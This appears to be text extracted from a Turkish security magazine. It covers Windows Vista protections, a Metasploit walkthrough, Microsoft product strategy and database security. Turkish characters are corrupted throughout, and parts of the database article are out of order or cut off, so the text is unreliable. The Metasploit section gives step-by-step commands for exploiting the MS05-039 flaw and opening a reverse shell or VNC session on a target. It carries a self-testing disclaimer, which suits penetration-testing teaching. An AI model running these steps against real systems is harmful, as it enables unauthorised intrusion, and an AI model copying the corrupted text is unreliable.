karfl› içinde Microsoft’un tarihindeki en popüler ürünlerinden biri olan ve birçok kullan›c› taraf›ndan be¤enilen Windows Defender’i bar›nd›r›yor. Windows Defender, spyware
gibi istenmeyen yaz›l›mlar› gerçek zamanl› olarak alg›l›yor
ve onlar› sistemden temizliyor. Ayr›ca Basit ve kolay kullan›c› arabirimi ile tüm kullan›c›lar için yüksek bir koruma
sa¤l›yor.
Network Access Protection (NAP) Client, yine Vista’n›n içinde yer alan güvenlik özelliklerinden biri (fiekil-4). NAP, flirket içindeki tüm iletiflimin kimli¤i do¤rulanm›fl, yetkilendirilmifl ve sa¤l›kl› bir flekilde yap›lmas›n› sa¤l›yor. IT yöneticilerinin belirledi¤i güncellemeler, antivirüs program›, firewall
program› ve kurallar› olmayan bilgisayarlar›n flirket a¤› içerisine girmesini engelliyor. 802.1X d›fl›nda DHCP, VPN ve IP-
SEC seviyesinde derinlemesine güvenlik sa¤layabiliyor. Sald›r›lara karfl› koruman›n son özelli¤i ise Address Space Layout Randomization (Rastgele Adres Yeri Belirleme). Bu
özellik sayesinde, Windows Vista yüklenirken DLL ve EXE’ler
haf›za içindeki 256 de¤iflik yere konulabiliyor. Bu da zararl›
kodun, onlar› bulmas›n› ve kullanmas›n› oldukça güçlefltiriyor. ASLR’nin en önemli özelli¤i, sald›r›lara karfl› iflletim sisteminin yerini haf›za içinde gizlemesi.
Windows Vista’n›n sahip oldu¤u güvenlik özelliklerinin son
bafll›¤› da Bilgiyi Koruma. Bitlocker teknolojisi, Vista’yla beraber gelen en önemli güvenlik özelliklerinden biri (fiekil-5).
Bitlocker sayesinde bütün iflletim sistemi flifrelenebiliyor.
Böylece özellikle mobil cihazlar›n kaybolmas› veya çal›nmas› durumunda d›flar›ya bilgi s›zmas› engelleniyor.
Windows Vista’n›n Bitlocker taraf›ndan korunan sürücü,
baflka bir bilgisayara tak›ld›¤› zaman içindeki hiçbir bilgi
okunam›yor. Bu özellik için Trusted Platform Module (TPM)
v1.2 kullan›l›yor. fiifreleme için gerekli olan anahtarlar sald›r›lara karfl› dayan›kl› TPM modülü içerisinde saklan›yor. Ayn› zamanda farkl› Bitlocker yap›land›rmalar› (TPM, USB, TPM
+ fiifre, TPM + USB gibi) ile güvenlik derecesi daha da artt›r›labiliyor. Bitlocker d›fl›nda EFS (Encrypting File
System)’deki geliflmeler ise, anahtarlar›n Smart Card’larda
fiekil-5
saklanabilmesi ve USB sürücülerinin de flifrelenebilmesi.
Son olarak da RMS (Rights Management Services) Client,
Vista’n›n içine entegre edilmifl durumda. Bilgi koruman›n en
önemli yöntemlerinden biri olan RMS sayesinde dokümanlar
ve e-postalar, kullan›c› baz›nda verilen haklara göre korunabiliyor. Böylece istenmeyen e-postalar›n d›flar›ya iletilmesi
veya kritik dokümanlarda bilgilerin kopyalanmas› gibi sorunlar ortadan kalk›yor.
Windows Vista gelifltirilirken, temel ve ek güvenlik özellikleri sayesinde dünyan›n en güvenilir iflletim sistemi olmaya
aday gibi görünüyor. Bugün kurumlar›n ve son kullan›c›lar›n
güvenlik bak›m›ndan karfl›laflt›klar› birçok sorunu çözecek
olan Windows Vista, art›k son kullan›c›lar için de haz›r durumda.
Erkan fiEN
[email protected]
Underground
GEÇEN SAYIMIZDA MSF (METASPLOIT FRAMEWORK)’ N KULLANIMINI KOMUTLAR
LE ANLATMI TIK. BU SAYIMIZDA DA MSF’ N KULLANIMINI KONSOL VE WEB
ARAYÜZÜNÜ KULLANARAK B R ÖRNEK LE AÇIKLAMAYA ÇALI ACA IZ
Bunun için öncelikle test
yapaca¤›m›z sistem üzerindeki
aç›klar›, bir aç›k tarama yaz›l›m›
ile kontrol edece¤iz. Ben bunun
için Nessus yaz›l›m›n›
kulland›m. Kulland›¤›m›z
tarama yaz›l›m› ile MSF’in
exploit bilgi bankas›ndaki
de¤erleri karfl›laflt›rmam›z
gerekiyor. Biz testlerimiz
s›ras›nda MS05-039
makalesinde bildirilen MS
aç›¤›n› kullanaca¤›z. Yandaki
resimde test yapaca¤›m›z
sistem üzerinde Nessus’un
buldu¤u aç›¤› görebilirsiniz.
fiimdi geçen say›m›zda de¤indi¤imiz komutlar yard›m› ile
uzak sistemin yönetimini ele geçirmeye çal›flaca¤›z. ‹lk olarak kullanaca¤›m›z komut sizinde hat›rlayaca¤›n›z gibi MSF
konsolumuzu çal›flt›rd›ktan sonra msf > show exploit komutu. Bu komut yard›m› ile ilgili exploit’leri listeleyerek bizim
kullanaca¤›m›z exploit’in kullan›m ad›n› bulaca¤›z. Afla¤›daki
resimler bu konuda gerekli aç›klamay› verecektir.
‹lgili exploit bulduktan sonra msf > use
ms05_039_pnp komutu yard›m› ile Nessus kullanarak
buldu¤umuz exploit’i seçiyor ve ayarlar›n› yapmak üzere haz›r hale getiriyoruz. Bu ayarlarda iflletim sistemi,
toplu güncellefltirme ve IP adresi gibi bilgilerimizi sisteme vererek kullan›ma haz›r hale getiriyoruz. Bu bilgilerin elimizde olmad›¤› durumlarda genel ayarlar yard›m›
ile de ilerleyebiliriz. Ancak sistem bilgileri birçok yaz›l›mla elde edilebilece¤i ve ço¤unlukla tespit etti¤imiz
aç›klarda bunu bize belirtti¤i için ince ayarlar› yapmak
daha etkin ve kullan›fll› bir yöntemdir.
Hedef sistemin iflletim sistemi ve SP bilgilerini biliyorsak bunu belirtiyoruz. E¤er bu bilgileri elde edemediysek genel tan›mlar› kullanabiliriz. msf > show targets
komutu yard›m› ile kullanabilece¤imiz seçenekleri
görüyoruz ve msf > set TARGET x komutu yard›m› ile
seçiyoruz.
Son olarak exploit edece¤imiz sistemi nas›l
yönetece¤imizi seçiyoruz. Bunun için msf > show
payloads komutu ile kullanabilece¤imiz yöntemleri listeletebiliriz. Burada hedef sistemin iflletim sistemi ve ba¤lant› tipi önemli. E¤er hedef sistemin ba¤lant›s› yavafl bir
ba¤lant›ysa ve bize komut sat›r› yeterli
olacaksa msf > set PAYLOAD win32_reverse
komutunu kullanabiliriz.
Bu bize hedef sistem üzerinde bir konsol açacak ve istedi¤imiz komutlar› çal›flt›rmam›z› sa¤layacakt›r. Ancak geçen say›m›zda da belirtti¤im gibi sistem üzerinde do¤rudan bir
kontrol ifllemi baz› avantajlar da sa¤layabilir. Sistemi VNC
kullanarak yönetmek için msf > set PAYLOAD win32_reverse_vncinject komutu kullan›labilir. Burada kullan›lan
VNC sunucusu özel olarak derlenmifl ve herhangi bir kay›t
defteri de¤eri veya sabit disk kullan›m›na ihtiyaç duymadan
haf›zada çal›flan özel bir derlemedir. Tüm bu ayarlar yap›ld›ktan sonra msf > exploit komutunu çal›flt›rarak sistemi
yönetmeye bafllayabiliriz. Afla¤›da da ekran görüntüsünü
gördü¤ümüz gibi sistemin yönetim ekran› karfl›m›za otomatik olarak aç›lacakt›r. Bundan sonra istedi¤iniz her ifllemi
uzaktan yönetti¤iniz sistem üzerinde sa¤layabilirsiniz.
Bu say›m›zda geçen say›da teorik olarak anlatt›¤›m›z MSF kullan›m›n› bir örnek
ile aç›klamaya çal›flt›k. Son olarak hat›rlatmak isterim ki, MSF kullan›m›na yer
vermemizin sebebi sadece kendi sistemlerinizi test etmeniz ve korsanlar›n
nas›l çal›flt›¤›n› anlaman›zd›r.
Metasploit yaz›l›m›n› kullanarak hedef seçimi
ve sisteme s›zma iflleminin ekran görünümü
Kullanaca¤›m›z exploit’i seçtikten sonra msf > set RHOST
x.x.x.x ve msf > set LHOST x.x.x.x komutlar› yard›m› ile
hedef ve kaynak sistemleri belirtiyoruz.
Göksel TOPBAfi
[email protected]
Microsoft Güvenlik Stratejisi
Uçtan Uca Güvenlik ve Altyap› Yönetim Çözümleri
üflterilerinden ve ifl ortaklar›ndan gelen talepler
do¤rultusunda, 2002 y›l›ndan bu yana bilgi güvenli¤i konusunda sürekli yat›r›mlarda bulunan
Microsoft, güvenli¤e bütünsel bir bak›fl getirerek, kurumlar›n tüm bilgi güvenli¤i ihtiyaçlar›n› karfl›lamay› ve güvenli bir
ekosistem oluflturmay› hedeflemektedir.
M
Microsoft, kifli ve kurulufllar›n dünya çap›ndaki ba¤lant›l› a¤larda, biliflim deneyimlerinin güvenli oldu¤u yönünde bir
kuflku duymadan, çok çeflitli cihazlar, ürünler, hizmetler ve
organizasyonlar aras›nda çal›flmalar›n› sa¤layan, daha güvenli bir dijital gelecek haz›rlamak istemektedir. Buna paralel olarak Microsoft’un güvenlik vizyonu –kifli ve kurulufllar›n, onlar için önemli olan bilgi, hizmet ve kiflilere daha güvenilir/güvenli bir flekilde ba¤l› olan çeflitli cihazlar› kullanabilecekleri- daha güvenli bir dünya yaratmakt›r. Microsoft
daha güvenli bir bilgi ifllem deneyimi sunmak için tüm endüstrinin ortak hareket etmesinin önemini vurgulamaktad›r.
Microsoft genifl kitlelere ulaflan ve internet üzerinden eriflilen MSN, Hotmail, Malicious Software Removal Tool gibi
ürünlerden elde edilen bilgilere dayanan tecrübe, istihbarat
ve bilgi birikimi sayesinde sürekli geliflen tehdit ortam›na sadece daha h›zl› yan›t vermekle kalmay›p, ayn› zamanda gelecekteki trendleri tahmin eden uzun vadeli güvenlik stratejileri gelifltirme yetene¤ine sahiptir.
Microsoft, 2002 y›l›ndan beri güvenlik alan›nda yapt›¤› yo¤un çal›flmalarla ç›kard›¤› Windows XP Service Pack 2, Windows Vista, Windows Server 2003 Service Pack 1 ve Windows Server 2003 R2 iflletim sistemlerinde güvenli¤i bafltan
ele alm›fl ve güvenlik aç›klar›n› azaltma, daha güvenli ve korunabilen sistemler oluflturma yönünde çok önemli ad›mlar
atm›flt›r. Ayl›k güvenlik yamalar› stratejisi, güvenlik yamalar›-
n› oluflturmada ve da¤›tmada kulland›¤› yeni teknolojiler ve
2002 y›l›ndan beri ç›kan tüm ürünlerde en önemli önceli¤in
güvenlik olmas› ile güvenli biliflimin sa¤lanmas› yönünde sektörde lider bir firmaya yak›flan önderlik ile tüm yaz›l›m firmalar›na örnek olmufltur ve olmaya devam etmek çabas› içerisindedir. Microsoft’un Güvenli Biliflim vizyonunun 4 önemli
parças› Güvenlik, Kiflisel Gizlilik, Güvenirlik ve Deneyim’dir.
Microsoft, güvenlik biliflim vizyonuyla birlikte güvenlik ürün
ve çözümleri alan›nda da çok önemli yat›r›mlar yapm›fl ve
birçok alanda k›sa sürede sektörün önemli firmalar› ile ifl ortakl›klar› kurmufltur. Araflt›rma ve gelifltirmesine ay›rd›¤›
100 Milyon Amerikan Dolar› üzerinde bütçe, kaynak ve ortaya koydu¤u inovasyon ile uçtan uca güvenlik ürün ve çözümleri üreten bir yaz›l›m firmas› haline gelmifltir.
Microsoft, Forefront Güvenlik ürün ailesi alt›nda toplad›¤›
sunucu, istemci ve a¤a eriflim güvenlik çözümleri ile Vista’n›n A¤ Eriflim Protokolü, Internet Explorer 7.0 içerisinde
yer alan anti-pishing gibi yeni geliflmifl güvenlik özellikleri,
Windows Server 2003 iflletim sistemi içerisinde yer alan ve
rüfldünü ispatlam›fl, EAL4+ sertifikas›na sahip Certificate
Authority’si ve sertifika yönetiminde yeni bir dönem bafllatacak Certificate LifeCycle Manager isimli yeni ürünü ile
Microsoft kurumlara ve kiflilere eksiksiz bir güvenli biliflim
ortam› sa¤lamay› hedeflemektedir.
Microsoft Dinamik Sistemler Giriflimi çerçevesinde, Microsoft
Forefront ürün ailesinin yan›nda sistem yönetim ürünlerini
içeren yeni ürün ailesi Microsoft System Center 2007 de,
önümüzdeki dönemde pazara ç›kacakt›r. Kendi kendini yöneten, kuran ve operasyonunu sa¤layan sistemleri hedefleyen
Microsoft, bu y›l sonunda ç›kmas› beklenen kod ad› Longhorn
olan Windows Server 2007 sunucu iflletim sistemi ile bu hedefine çok yaklaflm›fl olacakt›r. Güvenlik ve sistem yönetimi
çözümlerinin entegre çal›flarak, kurumlara büyük verimlilik
ve eriflilebilirlik art›fllar› getirmesi öngörülmektedir.
System Center 2007 ürün ailesi içerisinde istemci ve sunucu sistemlerinin uzaktan yönetimi, yama geçifli, yaz›l›m da¤›t›m› ve envanter yönetimi gibi çok önemli operasyonel ifllevlere yeni boyut kazand›ran System Management Server’›n yeni sürümü Microsoft System Center System Configuration Manager 2007, istemci ve sunucu sistemlerinin ve
uygulamalar›n›n proaktif ve reaktif yönetimi, gözlemlenmesi ve hata gideriminde çok büyük faydalar sa¤layan Microsoft’un entegre çözümü, Microsoft Operations Manager’›n
yeni sürümü, Microsoft System Center Operations Manager
2007 ürünleri bu y›l içerisinde pazara ç›kacakt›r. Orta ölçekli iflletmelerin istemci ve sunucu sistem iflletimi ve yönetimi
için de bu iki ürünün bir arada entegre bir flekilde çal›flan sürümü Microsoft System Center Essentials 2007 ürünü pazara ç›kacakt›r. Kurumsal firmalar›n büyük ihtiyac› olan servis
masas› çözümü için Microsoft çal›flmalar›na devam etmektedir ve bu y›l›n sonuna do¤ru Microsoft System Center Service Desk ürününü pazara sunacakt›r. Afla¤›da Microsoft
System Center ürün ailesinin yol haritas›n› bulabileceksiniz.
Microsoft Forefront güvenlik ürün ailesi içerisinde sunucu,
istemci ve a¤ eriflim güvenli¤ini sa¤layan üç ana kategori
bulunmaktad›r. E-posta ve birlikte çal›flma ortamlar›n›n güvenli¤ini sa¤lama ve anti-spam özellikleri ile kurumlara gereksiz çok say›da e-posta gelmesini engelleyerek, güvenlik
risklerini de ortadan kald›ran Antigen ürünü, Microsoft Forefront ürün ailesi alt›nda Microsoft Forefront Security for
Exchange Server ve Microsoft Forefront Security for Sharepoint Server olarak 2006 y›l›n›n son günlerinde pazara sunulmufltur. Özellikle pazara yeni sürülen ve iflletmelere büyük verimlilik ve üretkenlik art›fl› getirmesi beklenen Office
System 2007 ürün ailesi içerisinde yer alan Exchange Server 2007 ve Sharepoint Portal Server 2007 ürünleriyle Microsoft, kurumlar›n e-posta ve birlikte çal›flma deneyimlerinde yeni bir dönem bafllat›rken, bu ortamlar›n güvenli¤ini de
en bafltan planlam›fl ve bu iki yeni ürünle birlikte güvenlik
çözümlerini de ayn› anda pazara ç›karm›flt›r. 25 Eylül
2006’da Gartner, 2006 E-mail Security Boundary Magic Quadrant raporunda Microsoft’u E-posta güvenli¤ini sa¤layan
lider firmalar aras›nda göstermifltir.
Microsoft’un istemci taraf›ndaki güvenlik ürünü Microsoft
Forefront Client Security’nin bu y›l ortas›nda ç›kmas› beklenmektedir. Kas›m ay›nda Beta’s› ç›kan ve etkin bir anti-virus/anti-spyware çözümü olan Forefront Client Security, kurumsal ortamlarda istemci ve sunucu güvenli¤ini en üst seviyeye tafl›may› hedeflemektedir. Microsoft’un en yeni ve ge-
(fiekil2)
liflmifl entegre internet ve a¤ geçidi çözümü Microsoft ISA
Server 2006, geçti¤imiz aylarda piyasaya ç›km›flt›. ISA Server 2006 kurumlar›n bilgi teknolojileri ortamlar›n› internet
tabanl› tehditlerden korurken, ayn› zamanda kurum için uygulamalara ve veriye h›zl› ve güvenli eriflimi sa¤lamaktad›r.
‹nternete kurum içi uygulamalar›n güvenli bir flekilde aç›lmas›, uzak ofis geçidi çözümlerinin etkinli¤i, veriminin artt›r›lmas› ve web eriflim korunmas› gibi çok önemli ifllevleri gerçeklefltiren ISA Server 2006, kurumlar›n uçtan uca güvenlik
çözümlerinin oluflturulmas›nda etkinli¤i ve kolay kullan›labilirli¤i ile önemli avantajlar sa¤layacakt›r. Microsoft’un güvenlik çözümlerini merkezde Forefront ürün ailesi olacak flekilde
afla¤›daki gibi k›saca özetlememiz mümkündür: (fiekil2)
Kurumlara içerik ve doküman denetimi ve güvenli¤inde çok
önemli avantajlar sunan Windows Rigths Management Services’den de bahsetmemiz uçtan uca güvenlik bak›fl›m›z›n
eksik kalmamas› için çok önemli diye düflünüyorum. Windows Server 2003’ün bir servisi olan Rights Management
Services ile kurumlar, kurum içi doküman ve e-postalar›n istenmeyen kiflilere yönlendirilmesi, okunmas› ya da yaz›c›dan ç›kt› al›nmas›n› önleyerek, bilginin güvenli¤i ve gizlili¤i
etkin bir flekilde sa¤lanabilmektedir. Microsoft kurumsal güvenli¤e bütünsel bir bak›fl getirerek kurumlar›n güvenli¤e
bak›fllar›n›n da eksiksiz olmas›n› sa¤lamakta ve genifl ekosisteminin bilgi ve tecrübesi ile kurumlar›n ihtiyac› olan güvenlik ihtiyaçlar› etkin bir flekilde karfl›lamaktad›r.
24-26 Ocak 2007 tarihleri aras›nda Microsoft Güvenlik Zirvesi’nde, Microsoft Forefront güvenlik ürünleri ailesi ve Microsoft System Center 2007 sistem yönetim ürün ailesi hakk›nda teknik sunumlarda çözümlerin detay›, etkinli¤i, müflteri ve ifl ortaklar›m›za aktar›lacakt›r. Microsoft olarak bu çok
önemli iki ürün ailesinin yeni ürünlerini 2007 y›l› içerisinde
ç›kar›yor olmaktan çok mutluyuz. Bu vesile ile Microsoft olarak 2007 y›l›n›n tüm Beyaz fiapka okurlar›na güvenli, verimli ve çok baflar›l› bir y›l olmas›n› gönülden dileriz.
Hakan ÜNSAL
[email protected]
ETK‹N B‹R VER‹TABANI GÜVENL‹⁄‹ S‹STEM‹ MODEL‹
Sizde “Sanctum” Var M›?
Sanctum: (isim) Özel oda/kutsal yer, kutsal yer, girilmesi
yasak, özel.
Etimoloji: Geç Ça¤ Latince
Telaffuz: 'sa[ng](k)-t&m
Büyük kurumlar›m›z›n “data center” ad›n› verdi¤imiz, a¤›rl›kl› olarak web ve veritaban› sistemlerini bulunduran merkezleri, yukar›daki “sanctum” tabirine ne kadar da uyuyor.
Adeta göz bebe¤i durumdalar. Tüm ifl zekam›z, flirketlerimizin hassas bilgileri, canl› tüm faaliyetlere temel olan veri bu
sanctum’larda duruyor. Bu veri merkezlerinde depolad›¤›m›z ve ço¤u zaman muazzam miktarlara ulaflabilen veriyi iki
ana kategori alt›nda s›n›fland›rabiliriz. “Uygulama Verileri”
ve “Dosyalar”. Dosyalara örnek olarak sunumlar, PDF’ler,
hesap tablolar›, e-postalar, ofis dokümanlar› vs. verilebilir ve
bu makalenin d›fl›nda baflka bir yaz›m›zda bunlara özel güvenlik mekanizmalar›ndan bahsetmeyi düflünüyoruz. Öte
yandan Uygulama Verisi ad›n› verdi¤imiz k›s›m ise genellikle de¤iflik kurumsal uygulamalar (VTYS, web uygulamalar›,
MRP sistemleri, CRM sistemleri vs.) taraf›ndan ifllenip saklan›yor ve kurumlar›n yapt›¤› “ifl”in do¤as›na ba¤l› olarak bu
tip veri çok çeflitlilik arz edebiliyor; kredi kart› numaralar›,
müflteri ve hesap bilgileri, sat›fl bilgileri/analizleri, finansal
bilgiler, stok bilgileri vs. Do¤al olarak, güvenlik sistemleri yöneticileri olarak bu sanctum’larda en yüksek güvenlik seviyesini istiyoruz. Ama ifl birimleri sahip veya yöneticilerinin
ise bu noktalara eriflimde kesintiye de hiç tahammülü yok.
fiu çeliflki muhakkak size tan›d›k geliyordur: “Çok güvenli olsun ama sak›n kesinti yaflamayal›m, sak›n eriflim yavafllamas›n”. Bu yaz›m›zda art›k bu çeliflkinin gerçek olmad›¤›n›, hem
çok h›zl› hem de çok güvenli sanctum’lar yaratman›n hangi
teknolojik yaklafl›mlarla mümkün olabilece¤ine dair ipuçlar›
vermeye çal›flaca¤›z.
Neyi Koruyaca¤›z?
Bütün veriler ayn› derecede kritik de¤ildir. Baz›lar› di¤erlerinden daha kritiktir, baz›lar› ise hiç önemli de¤ildir. Bu cümle biraz George Orwell’›n meflhur 1984 roman›n› and›r›yor
ama bilgi güvenli¤i aç›s›ndan bakt›¤›m›zda, hassas veriyi
tespit edip belirlemek ve bu hassas veriyi tüm muhtemel
tehditlerden korumaya yo¤unlaflmam›z gerekti¤i konusunda güzel bir hat›rlat›c›. Genelde 4 tip hassasiyetten bahsedebiliriz:
1. Finansal bilgi, müflteri bilgisi gibi yetkisiz kaynaklar/kifliler
taraf›ndan eriflilmemesi gereken gizli bilgi . (Condifentiality)
2. Kredi kart› numaras›, hesap bilgisi gibi yetkisiz eriflimden
korunmas› gereken kifliye/kuruma özel bilgi. (Privacy)
3. Menkul k›ymetler borsas› fiyatlar›, döviz paritesi gibi içeri¤inin yetkisiz de¤iflimden korunmas› gereken bilgi. (Integrity)
4. Sistem süreklili¤ini devam ettirmek için korunmas› gereken sistem verileri. (Availability)
Bu tür kritik veriye yönelik tehditleri ise iki ana bafll›k alt›nda gruplayabiliriz:
Önceliklerin ve/veya yetkilerin ihlali: Kullan›c›lar söz konusu veriye eriflim esnas›nda kendilerine tan›nm›fl olan s›n›rlar›n/yetkilerin ötesine geçmeye çal›flarak bilgiyi de¤ifltirmeye, bozmaya ya da kendilerine sunulandan fazlas›na eriflmeye çal›flabilirler (örne¤in veritaban›ndan tüm müflteri kay›tlar›n› okumaya çal›flan bir DBA ya da web sitesi üzerinden
SQL injection ile flifresini bilmedi¤i bir baflka kullan›c›n›n bilgilerine eriflmeye çal›flan bir son kullan›c›).
Zafiyetlerin aç›¤a ç›kart›lmas›, bunlardan faydalanma:
Sunulan hizmete eriflimi olan kullan›c›lar›n söz konusu sistem bileflenlerinin birinde ya da birkaç›nda var olan zafiyetlerden, konfigürasyon hatalar›ndan yararlanarak, bunlar›
kullanarak, kendilerine tan›nan eriflim haklar›n› daha üst seviyeye ç›kartmalar› ve yetkileri olmayan bilgilere/kaynaklara eriflmeleri.
Bu tehditler hem iç hem d›fl risk unsurlar›ndan kaynaklanabilir. Örne¤in müflteriler, ifl ortaklar› ve internet kullan›c›lar›
gibi hizmet olarak sundu¤unuz uygulamalara eriflme imkan›
olan kullan›c›lar, kendi gelifltirdi¤iniz ya da sat›n ald›¤›n›z uygulama içindeki (veya altyap›s›ndaki) aç›klar› ortaya ç›kartarak uygulaman›z ya da onu destekleyen arka plandaki veritaban›n›z içindeki bilgiye yetkisiz eriflim sa¤layabilirler. Ço¤unlukla güvendi¤iniz ve dolay›s›yla gözünüzün kula¤›n›z›n
pek de üzerinde olmad›¤› iç kullan›c›lar da uygulamalar›n›z,
onlar› sa¤l›kl› çal›flmas›n› sa¤layan altyap›sal bileflenler ve
arka plan›ndaki veritabanlar› üzerinde var olan aç›klardan
faydalanma yoluna gitmeyi tercih ederek ayn› flekilde yetkisiz eriflim giriflimlerinde bulunabilir. Yöneticiler (a¤ yöneticileri, sistem yöneticileri, veritaban› yöneticileri), ve uygulama/kod gelifltiriciler, eriflme/de¤ifltirme yetkileri olmayan
verilere eriflmek için birçok arka kap›y› çeflitli flekillerde aç›k
b›rakabilir. Örne¤in bir okuldaki tüm ö¤retmenlerin s›nav sonuçlar›n› girdi¤i, buna ba¤l› olarak hangi ö¤rencinin sene sonunda hangi baflar› seviyesinde oldu¤unu, s›n›fta kal›p kalmad›¤›n› belirleyen otomatik bir sistemi tasarlayan kifli, verilerin birikti¤i veritaban›nda, kendi gelifltirdi¤i uygulamay›
kullanmadan, do¤rudan icra edece¤i basit bir “update” temelli SQL cümleci¤i ile arkas›nda hiç iz/log vs. b›rakmadan
kendine yak›n buldu¤u bir ö¤rencinin s›nav notlar›n› illegal
bir flekilde yükseltebilir çünkü bu tip kod gelifltiricilerin söz
konusu uygulama/veri tabanlar›na hemen hemen her za-
man en genifl eriflim mekanizmalar› ile eriflmesine izin verilmifl durumdad›r (çünkü o suyun bafl›ndaki adamd›r ve su kesilirse herkesi rahats›z edip, ortal›¤› aya¤a kald›rmaktad›r).
Özetle, sistemlerimizde tan›mlad›¤›m›z kullan›c›lar›n kendilerine tan›nm›fl hassas veriye eriflim, de¤ifltirme ve silme
haklar›n›/seviyelerini ihlal etmelerine engel olmaya çal›fl›yoruz. Ve bunun yan› s›ra istisnas›z herkesin sanctum’lar›m›zdaki muhtemel zafiyetlerden faydalanarak hassas bilgilere
eriflmesini, de¤ifltirmesini ve yok etmesini engellemeye çal›fl›yoruz.
Peki bu hassas bilginin ne oldu¤una ve nerede bulundu¤una
nas›l karar verece¤iz? Bu konuya afla¤›da tekrar geri dönece¤iz.
Nas›l Koruyaca¤›z?
Varsayal›m ki veritabanlar›m›z›n önünde bir bekçi var ve bu
veritabanlar›na giren ç›kan tüm verinin en alt seviyede takibini (auditing) yap›yor ve her türlü flüpheli veritaban› hareketinde bizi uyar›yor. Ve yine varsayal›m ki bu bekçi, bizim
zararl› olarak tan›mlad›¤›m›z her türlü hareket tan›m›na
uyan trafi¤i durduruyor. Üstelik de eriflim h›z›nda hiçbir yavafll›k yaratm›yor.
Elbette bu çok güzel olurdu ama büyük sorun flu ki, bu bekçiye neyi nas›l 'audit' edece¤ini çok detayl› bir flekilde ö¤retmemiz gerekir. Neyin uyar› mekanizmalar›n› devreye sokaca¤›n›, neyin ise do¤rudan durdurulmas› gerekti¤ini tek tek
belletmemiz gerekecektir bu bekçiye. Üstelik (maalesef), ço¤unlukla bu belletme görevini yapmas›n› bekledi¤imiz kurumumuzdaki güvenlik yöneticisi zaten (hali haz›rda kurumdaki veritabanlar› üzerindeki uygulama detaylar›na sahip olma
aç›s›ndan düflünüldü¤ünde) bir nevi kördür. Yani ondan veritaban›ndaki hangi tablo üzerinde hangi kullan›c›n›n update, hangi kullan›c›n›n select yapma hakk› oldu¤unu bilmesini
beklememiz ve buna dayanarak bekçiye belletme yapmas›n›
beklememiz biraz ütopik olur. Dolay›s›yla, veritabanlar›na
eriflim aç›s›ndan düflünüldü¤ünde, çal›flma ortam›n›z› anlamak ve bu ortam içindeki aktiviteyi çok iyi analiz edebilmek,
veritabanlar›n›n güvenli¤ini en üst seviyeye çekebilmek aç›s›ndan anahtar unsurdur.
si/leri ise daha az önemlidir ve korunmas› için imkan/kaynak
harcanmas›na ihtiyaç yoktur?)
• Bu bilgiye de¤iflik kaynaklar taraf›ndan nas›l eriflilmektedir?
• Ne zaman, hangi IP’den, hangi client-side tool ile, hangi
tablolara, hangi operasyonlar ile (select, update, delete)?
• Bilgiye eriflilmesini istedi¤iniz yöntemler bu mudur?
• Bilgiye eriflimin en güvenli yolu bu mudur?
• Her eriflim kayna¤›ndan (source) gelen tehdit (seviyesi/miktar›) nedir?
• Hassas bilgilere eriflimi k›s›tlamak için hangi eriflim kontrol
mekanizmalar› devreye sokulabilir/sokulmaktad›r?
• Veritaban›nda ve destekleyicisi olan altyap›s›nda herhangi
bir zafiyet (vulnerability) var m›d›r?
• Yanl›fl/eksik konfigüre edilmifl veritabanlar›,
• Vendor aç›klar› vs.
• Bu zafiyetlerin aç›¤a ç›kar›lmas›na/kullan›lmas›na engel
olabilecek güvenlik kontrolleri nelerdir?
Özetle; kapsaml› bir veritaban› güvenli¤i projesinin üç ana
bilefleni olmal›d›r ve bu makalenin geri kalan k›s›mlar›nda bu
üç ana bileflen etraf›nda flekillenen model hakk›nda detaylara inmeye çal›flaca¤›z:
1. De¤erlendirme
- Hassas bilgi nedir ve nerededir?
- Normal flartlar dahilinde bu bilgilere nas›l erifliliyor?
- ‹hlaller hangi noktada ve nas›l olabilir?
2. Koruma
- Kritik bilgiye eriflimin s›n›rlanmas›
- Olas› zafiyetlerden faydalan›lmas›n›n engellenmesi
3. Audit
- Kritik bilgiye eriflimin takibinin yap›lmas›
- Uygun seviye ve miktarda raporlaman›n yap›lmas›
fiekil 1: Veritaban› Korumas›n›n Üç Aflamas›
‹flte bu noktada “veritaban› güvenlik de¤erlendirmesi” süreçleri devreye girer. Bu süreçlerin birkaç amac›, baflka bir
deyiflle cevaplamaya çal›flt›¤› birkaç soru vard›r:
• Hangi bilgi hassast›r ve korunmas› gerekmektedir? (Baflka
bir deyiflle hangi bilgi kritiktir ve korunmas› gerekir, hangi-
ETK‹N B‹R VER‹TABANI GÜVENL‹⁄‹ S‹STEM‹ MODEL‹
Sizde “Sanctum” Var M›?
Veritaban› Güvenlik De¤erlendirmesi Nedir?
T›pk› bir boks antrenörünün yetifltirdi¤i sporcunun as›l maça ç›kmadan önce aç›klar›n› keflfetmek ve kapatmas›n› ö¤renmek/ö¤retmek için üst üste savurdu¤u yumruklar gibi
uygulamalar›n›za ve/veya veritabanlar›n›za do¤ru, onlar›n
aç›k noktalar›n› bulmak amac›yla üst üste yapt›¤›n›z sald›r›lar m›d›r? Ya da yanl›fl/eksik konfigürasyon unsurlar›n›/kusurlar›n› bulmak için i¤ne ile kuyu kazar gibi tüm veritabanlar›n›z üzerinde ince ince yapt›¤›n›z araflt›rmalar ve gözden
geçirmeler midir? Bu iki örne¤i özellikle veriyoruz çünkü ço¤u zaman güvenlik de¤erlendirmeleri (security assessment), zafiyet de¤erlendirmesi (vulnerability assessment)
ve aç›k taramas› (vulnerability scanning) ile kar›flt›r›l›yor. Bu
son ikisi güvenlik de¤erlendirmesi süreçlerinde faydalan›lan
birçok araçtan sadece ikisidir. Baflka bir deyiflle, güvenlik
de¤erlendirmesi sadece bu ikisinden daha öte bir fleydir.
Gerçek anlamda veri güvenli¤ini elde etmek için sanctum’lar›n›zdaki uygulama verisini iflleyen tüm varl›klar›n›z (web sunucular, uygulama sunucular› ve veritabanlar›) üzerinde de¤erlendirme, koruma ve auditing süreçlerini eksiksiz olarak
uygulaman›z gerekmektedir. Bu hedeflere ulaflmak için bir
çok yol vard›r. Web ve uygulama sunucular› için güvenli kodlama tekniklerini takip edebilirsiniz, gelifltirdi¤iniz kodun uzman sistemler ya da dan›flmanlar taraf›ndan gözden geçirilmesini sa¤layabilirsiniz, s›zma testleri uygulayabilirsiniz
(penetration testleri), yamalar› güncel olarak uygulayabilirsiniz, sunucu s›k›laflt›rmas› prensiplerini s›k› s›k›ya takip edebilirsiniz ve web/XML uygulama firewall’lar› kullanabilirsiniz. Piyasadaki kimi ürünler bu ifllevlerin birden fazlas›n›
bünyesinde bulundurmaktad›r. Baz›lar› sadece bir alanda
(örne¤in kod analizi) derinlemesine inceleme imkan› sa¤lar
